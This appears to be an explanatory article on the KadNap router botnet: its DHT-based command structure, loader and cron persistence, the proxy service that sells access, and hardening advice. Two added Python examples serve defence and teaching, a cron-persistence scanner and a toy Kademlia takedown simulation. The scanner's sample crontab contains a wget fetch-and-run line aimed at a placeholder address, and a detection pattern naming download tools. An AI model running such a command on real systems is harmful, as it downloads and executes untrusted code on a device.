Weeks ago, security researchers warned about a new and active botnet that is turning home routers and other edge equipment into proxies at the disposal of criminals. According to the threat research team known as Black Lotus Labs, this malware, named KadNap, has grown remarkably since August 2025 and has already gathered tens of thousands of devices into a peer-to-peer network that complicates their tracking and mitigation.
The technical key to the problem is that KadNap uses a variant of the Kademlia protocol, a distributed hash table (DHT), to hide and distribute command-and-control (C2) information. Instead of relying on a single central server, infected devices communicate with each other to locate the control nodes, so removing one particular IP address does not disable the botnet. For the underlying idea, see the technical explanation of Kademlia in public sources such as the Wikipedia entry: https://en.wikipedia.org/wiki/Kademlia.

The reported technical modus operandi starts with the download of a malicious script (called aic.sh in the analysis) from a specific IP address. This script persists on the device by creating a scheduled task that runs frequently, and then installs an ELF binary, called kad in the findings, that acts as the botnet client. The binary looks up the machine's external IP address and synchronizes its clock with NTP services to calibrate its behaviour before joining the peer network.
Despite the decentralized appearance, researchers detected a pattern that opens a defensive window: KadNap's implementation of Kademlia maintains constant connections to two specific nodes before reaching the final control servers. This behaviour reduces the real degree of decentralization and makes it easier to identify infrastructure that is relevant for exclusion or blocking. The discovery and analysis were published by Black Lotus Labs; their work highlights how attackers mix P2P techniques with repetitive operational habits that sometimes give them away.
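The scheduled-task persistence described above (ATT&CK T1053) is something a defender with shell access to a Linux-based device can look for. The following is an added example, not code from the page or from Black Lotus Labs: it parses cron-style entries (an assumption about the scheduler; the crontab lines, the /tmp path and the 192.0.2.10 address are constructed for the demo, not indicators from the analysis) and flags jobs that run at short intervals and either execute from a writable directory or download something at run time.

```python
import re

# Constructed crontab lines for the demo (not real indicators from the analysis).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * /tmp/aic.sh >/dev/null 2>&1
* * * * * wget -q -O /tmp/x.sh http://192.0.2.10/x.sh && sh /tmp/x.sh
30 2 * * 0 /usr/local/bin/backup.sh
"""

WRITABLE_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
FETCH_TOOLS = re.compile(r"\b(wget|curl|tftp)\b")

def minute_interval(minute_field):
    """Smallest run interval in minutes implied by the cron minute field.
    Handles '*', '*/n', single values and comma lists (lists approximated
    as 60 / number of entries); the hour field is deliberately ignored."""
    if minute_field == "*":
        return 1
    step = re.fullmatch(r"\*/(\d+)", minute_field)
    if step:
        return int(step.group(1))
    return 60 // len(minute_field.split(","))

def suspicious_cron_entries(crontab_text, max_interval=10):
    """Flag jobs that run at least every `max_interval` minutes AND either run
    from a world-writable directory or fetch content with a download tool,
    i.e. the combination a loader like aic.sh needs to survive reboots.
    Returns a list of (cron line, [reasons])."""
    findings = []
    for line in crontab_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split(None, 5)  # m h dom mon dow + command
        if len(fields) < 6:
            continue
        minute, command = fields[0], fields[5]
        reasons = []
        if minute_interval(minute) <= max_interval:
            if any(d in command for d in WRITABLE_DIRS):
                reasons.append("runs from a writable dir")
            if FETCH_TOOLS.search(command):
                reasons.append("downloads at run time")
        if reasons:
            findings.append((line, reasons))
    return findings
```

On a real device the input would be the output of `crontab -l` for each user plus the files under /etc/cron.d, and a hit is a reason to inspect the referenced script, not proof of infection.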
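To make concrete both why removing one IP does not disable a DHT-based botnet and why the reported dependency on two fixed nodes is a weakness, here is an added toy simulation (not code from the page or from Black Lotus Labs): a small Kademlia-style overlay with XOR distance and k-buckets, in which a record is replicated on the k closest nodes so a lookup still succeeds after the closest holder is taken down. The relay step that models the two fixed nodes is an assumption of this demo, not a documented KadNap mechanism.

```python
import random

K = 3  # Kademlia's k (bucket size and replication factor); tiny for the demo

def xor_distance(a, b):
    return a ^ b  # Kademlia's metric; (a ^ b).bit_length() is the k-bucket index
class DhtNetwork:
    """Toy Kademlia overlay (8-bit IDs; real Kademlia uses 160-bit): each node keeps
    up to K contacts per k-bucket; a record lives on the K live nodes closest to its key."""
    def __init__(self, node_ids, seed=7):
        rnd = random.Random(seed)
        self.alive, self.holders, self.contacts = set(node_ids), set(), {}
        for n in node_ids:
            buckets = {}
            for m in node_ids:
                if m != n:
                    buckets.setdefault((n ^ m).bit_length(), []).append(m)
            self.contacts[n] = {m for b in buckets.values()
                                for m in rnd.sample(b, min(K, len(b)))}
    def store(self, key):  # e.g. the record that tells peers where the C2 nodes are
        self.holders = set(sorted(self.alive, key=lambda n: xor_distance(n, key))[:K])
    def remove(self, *nodes):  # takedown or block of one or more nodes/IPs
        self.alive.difference_update(nodes)
    def lookup(self, start, key):
        """Iterative FIND_NODE: query the K closest known live nodes, learn their contacts,
        repeat until nothing closer appears. Returns (record reachable, nodes queried)."""
        shortlist, queried = {start}, set()
        while True:
            closest = sorted((n for n in shortlist if n in self.alive),  # dead = timeout
                             key=lambda n: xor_distance(n, key))[:K]
            todo = [n for n in closest if n not in queried]
            if not todo:
                return bool(queried & self.holders), len(queried)
            for n in todo:
                queried.add(n)
                shortlist |= self.contacts[n]
    def lookup_via_relays(self, key, relays):
        """Assumed model of the reported habit: peers always pass through two fixed
        relay nodes first, so the DHT's resilience only helps while a relay is up."""
        live = [r for r in relays if r in self.alive]
        return self.lookup(live[0], key) if live else (False, 0)

def demo(key=0xA5):
    net = DhtNetwork(random.Random(1).sample(range(256), 40))  # 40 nodes, 8-bit IDs
    net.store(key)
    net.remove(min(net.holders, key=lambda n: xor_distance(n, key)))  # closest holder gone
    survives = net.lookup(min(net.alive), key)[0]                # True: replicas remain
    relays = sorted(net.alive - net.holders)[:2]                 # two fixed relay nodes
    net.remove(*relays)                                          # ... get blocked
    return survives, net.lookup_via_relays(key, relays)[0]       # (True, False)
```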
Geographically, most of the compromised devices are located in the United States, approximately 60% according to the report, with additional concentrations in Taiwan, Hong Kong and Russia. The botnet reached around 14,000 nodes in the analyzed window, and almost half of these devices are associated with control infrastructure specifically aimed at ASUS routers.
As for monetization, researchers link KadNap to a proxy service called Doppelganger, which appears to be a repackaging of earlier services such as Faceless. These markets sell access to infected machines as "residential proxies", useful for hiding malicious traffic and getting around blocks: from DDoS attacks to credential stuffing and brute-force campaigns. This turns compromised home equipment into a commercial resource for criminal actors seeking anonymity and geographic filtering of their traffic.
Defensive actions were not long in coming: Lumen stated that it has blocked traffic associated with the identified control infrastructure on its own network, and announced that it would publish indicators of compromise (IOCs) to help other operators and administrators detect and mitigate the botnet. These measures make it clear that cooperation between researchers, operators and vendors is critical when a threat is distributed across the global network.
What can a home user or a small-network administrator do right now? Updating the router firmware and changing the default credentials is the first line of defense; many infections on edge devices thrive on weak credentials and unpatched versions. It is also advisable to disable remote management functions if they are not used, enable WPA2/WPA3 encryption on the Wi-Fi, and segregate IoT devices onto a network separate from the main one. If an infection is suspected, a reboot is not always enough: restoring factory settings and then applying the latest firmware is the safest way to clean a compromised router. For good-practice and mitigation references, official guides from public agencies and security frameworks are useful; for example, CISA's recommendations for protecting home and teleworking networks offer concrete steps: https://www.cisa.gov/publication/securing-home-networks-work. It is also worth reviewing documented persistence techniques in frameworks such as MITRE ATT&CK, which describe how malware uses scheduled tasks to survive reboots: https://attack.mitre.org/techniques/T1053/.

KadNap's story illustrates two trends that should be kept in mind: on the one hand, attackers expand their reach by exploiting consumer devices that were not designed with robust security; on the other, they resort to P2P architectures and concealment techniques to make it hard to disrupt their services. The combination of poorly protected devices and illegal businesses that sell "access as a service" creates an ecosystem in which damage scales quickly and the response requires both individual technical measures and coordinated interventions at the network and community level.
For those who want to go deeper into the technical analysis and follow-up of this botnet, the most prudent approach is to consult the original analysis by the researchers who documented it and the updates published by security response organizations. The work of Black Lotus Labs has been the main public source on this incident; it demonstrates the usefulness of threat research for mapping tactics, techniques and procedures and for providing block lists that help stop proliferation.
In short, the emergence of KadNap reminds us that security begins at home: keeping equipment up to date, changing default credentials and applying good segmentation and monitoring practices significantly reduce the risk that our router becomes one more piece of a botnet.